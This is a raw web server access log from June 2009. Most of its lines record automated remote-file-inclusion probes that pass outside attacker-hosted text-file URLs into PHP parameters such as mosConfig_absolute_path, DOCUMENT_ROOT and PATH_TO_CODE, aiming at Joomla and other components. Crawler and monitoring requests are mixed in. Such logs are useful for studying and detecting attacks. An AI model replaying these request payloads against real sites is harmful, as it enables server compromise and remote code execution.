70.85.165.10 - - [12/Jun/2009:01:43:40 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:43:44 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 206 "-" "libwww-perl/5.811"
67.18.204.152 - - [12/Jun/2009:01:43:51 -0400] "GET /logs/error_log.Q109052500//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:01:44:08 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:01:44:08 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:01:44:08 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
91.198.32.3 - - [12/Jun/2009:01:44:21 -0400] "GET /logs/error_log.Q109052000/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
118.129.166.10 - - [12/Jun/2009:01:44:24 -0400] "GET /logs/error_log.Q109060300%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:01:44:25 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
70.85.165.10 - - [12/Jun/2009:01:45:06 -0400] "GET /logs/error_log.Q109050800/?DOCUMENT_ROOT=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:45:09 -0400] "GET /?DOCUMENT_ROOT=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:45:14 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 200 5170 "-" "libwww-perl/5.811"
66.249.71.54 - - [12/Jun/2009:01:45:16 -0400] "GET /images/logo_13.gif HTTP/1.1" 200 498 "-" "Googlebot-Image/1.0"
91.198.32.3 - - [12/Jun/2009:01:45:58 -0400] "GET /logs/error_log.Q109052600/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:01:45:59 -0400] "GET /logs/error_log.Q109051300/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:01:45:59 -0400] "GET /logs/access_log.Q109052400/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
70.85.165.10 - - [12/Jun/2009:01:46:18 -0400] "GET /logs/error_log.Q109011700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:46:18 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:46:22 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
209.59.12.99 - - [12/Jun/2009:01:46:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.198.32.3 - - [12/Jun/2009:01:46:27 -0400] "GET /logs/error_log.Q109051900/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
70.85.165.10 - - [12/Jun/2009:01:46:33 -0400] "GET /logs/error_log.Q109041400/e404.php?DOCUMENT_ROOT=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
91.198.32.3 - - [12/Jun/2009:01:46:51 -0400] "GET /logs/error_log.Q109052400/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:01:46:51 -0400] "GET /logs/access_log.Q109052600/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
67.18.204.152 - - [12/Jun/2009:01:47:10 -0400] "GET /logs/error_log.Q109052500//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.198.32.3 - - [12/Jun/2009:01:47:11 -0400] "GET /logs/access_log.Q109010700/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
64.59.71.64 - - [12/Jun/2009:01:47:11 -0400] "GET /logs/error_log.Q109052500//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.198.32.3 - - [12/Jun/2009:01:47:11 -0400] "GET /logs/error_log.Q108082300/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:01:47:11 -0400] "GET /logs/access_log.Q109052300/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
70.85.165.10 - - [12/Jun/2009:01:47:30 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
121.165.73.157 - - [12/Jun/2009:01:47:36 -0400] "GET /logs/access_log.Q109060500%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:01:47:36 -0400] "GET /logs/access_log.Q109052800%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
91.198.32.3 - - [12/Jun/2009:01:47:40 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:01:47:41 -0400] "GET /logs/error_log.Q109052300/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:01:47:41 -0400] "GET /logs/error_log.Q108052600/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
66.249.71.14 - - [12/Jun/2009:01:47:44 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L30734A372CF8F600714901W+WSEQ(S0060):1+OUITEM(A0200):04948401 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
70.85.165.10 - - [12/Jun/2009:01:47:58 -0400] "GET /logs/error_log.Q109041400/?DOCUMENT_ROOT=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
62.210.190.230 - - [12/Jun/2009:01:48:07 -0400] "GET /logs/error_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 247 "-" "Mozilla/5.0"
62.210.190.230 - - [12/Jun/2009:01:48:08 -0400] "GET //blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
62.210.190.230 - - [12/Jun/2009:01:48:08 -0400] "GET /logs//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.85.165.10 - - [12/Jun/2009:01:48:48 -0400] "GET /logs/access_log.Q109052400%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.811"
209.62.42.51 - - [12/Jun/2009:01:49:09 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.62.42.51 - - [12/Jun/2009:01:49:09 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.62.42.51 - - [12/Jun/2009:01:49:09 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
70.85.165.10 - - [12/Jun/2009:01:49:15 -0400] "GET /logs/access_log.Q109052400%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.811"
209.62.42.51 - - [12/Jun/2009:01:49:16 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
91.198.32.3 - - [12/Jun/2009:01:49:33 -0400] "GET /logs/error_log.Q109051300%20/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
67.19.26.122 - - [12/Jun/2009:01:49:55 -0400] "GET /logs/error_log.Q109052500//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.198.32.3 - - [12/Jun/2009:01:50:37 -0400] "GET /logs/error_log.Q109052300%20/index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.199.14.40 - - [12/Jun/2009:01:51:02 -0400] "GET /logs/access_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.199.14.40 - - [12/Jun/2009:01:51:02 -0400] "GET //blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
121.199.14.40 - - [12/Jun/2009:01:51:03 -0400] "GET /logs//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.62.42.51 - - [12/Jun/2009:01:51:07 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.62.42.51 - - [12/Jun/2009:01:51:12 -0400] "GET /logs/access_log.Q109052500%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:01:51:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.165.10 - - [12/Jun/2009:01:51:46 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
216.75.9.13 - - [12/Jun/2009:01:52:06 -0400] "GET /logs/error_log.Q109052500//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.119.103.12 - - [12/Jun/2009:01:52:57 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
216.119.103.12 - - [12/Jun/2009:01:52:57 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
216.119.103.12 - - [12/Jun/2009:01:52:57 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
64.6.15.41 - - [12/Jun/2009:01:55:34 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:01:55:34 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:01:55:34 -0400] "GET /logs/access_log.Q109052200%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:01:55:35 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:01:55:35 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:01:55:36 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:01:56:01 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:01:56:01 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:56:01 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:56:01 -0400] "GET /logs/access_log.Q109052200%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:56:01 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:56:04 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:56:04 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:56:05 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:01:56:06 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.6.22.170 - - [12/Jun/2009:01:56:07 -0400] "GET /images/ HTTP/1.0" 200 49338 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
187.25.80.250 - - [12/Jun/2009:01:56:16 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://typh0n.awardspace.co.uk/id.txt???? HTTP/1.1" 404 267 "-" "libwww-perl/5.820"
187.25.80.250 - - [12/Jun/2009:01:56:16 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://typh0n.awardspace.co.uk/id.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.820"
187.25.80.250 - - [12/Jun/2009:01:56:16 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://typh0n.awardspace.co.uk/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.820"
209.59.12.99 - - [12/Jun/2009:01:56:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.6.15.41 - - [12/Jun/2009:01:56:28 -0400] "GET /logs/error_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.6.15.41 - - [12/Jun/2009:01:56:50 -0400] "GET /logs/error_log.Q109052000%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:57:49 -0400] "GET /logs/error_log.Q109052000%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:58:44 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:58:44 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:58:48 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:59:11 -0400] "GET /logs/error_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
187.25.80.250 - - [12/Jun/2009:01:59:13 -0400] "GET /logs/error_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://typh0n.awardspace.co.uk/id.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.820"
74.6.22.170 - - [12/Jun/2009:01:59:42 -0400] "GET /images/ACE_Creditform.pdf HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.223.3.98 - - [12/Jun/2009:01:59:58 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:59:58 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jun/2009:01:59:58 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.119.103.12 - - [12/Jun/2009:02:00:17 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
89.223.3.98 - - [12/Jun/2009:02:00:25 -0400] "GET /logs/error_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.6.22.170 - - [12/Jun/2009:02:01:25 -0400] "GET /logs/access_log.Q109060300 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/Jun/2009:02:01:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.165.10 - - [12/Jun/2009:02:01:48 -0400] "GET /logs/access_log.Q109051000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:02:02:01 -0400] "GET /logs/access_log.Q109051800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
118.129.166.10 - - [12/Jun/2009:02:03:25 -0400] "GET /logs/error_log.Q109060300//components/com_cpg/cpg.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.129.166.10 - - [12/Jun/2009:02:03:52 -0400] "GET /logs/error_log.Q109060300//components/com_cpg/cpg.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.23.156 - - [12/Jun/2009:02:04:26 -0400] "GET /logs/access_log.Q109052400/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:02:04:26 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:02:04:26 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:02:04:29 -0400] "GET /logs/access_log.Q109060800/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.813"
211.189.18.73 - - [12/Jun/2009:02:05:51 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:02:05:51 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:02:05:51 -0400] "GET /logs/access_log.Q109051000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:02:05:51 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:02:05:51 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:02:05:51 -0400] "GET /logs/access_log.Q109051000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:06:00 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:06:00 -0400] "GET /errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:06:00 -0400] "GET /logs/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:06:01 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:06:01 -0400] "GET /errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:06:01 -0400] "GET /logs/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
211.189.18.73 - - [12/Jun/2009:02:06:02 -0400] "GET /logs/access_log.Q109052200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:02:06:02 -0400] "GET /logs/access_log.Q109052200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:06:03 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:06:03 -0400] "GET /errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:06:03 -0400] "GET /logs/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
209.59.12.99 - - [12/Jun/2009:02:06:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.128.53.115 - - [12/Jun/2009:02:07:09 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:07:12 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:07:12 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
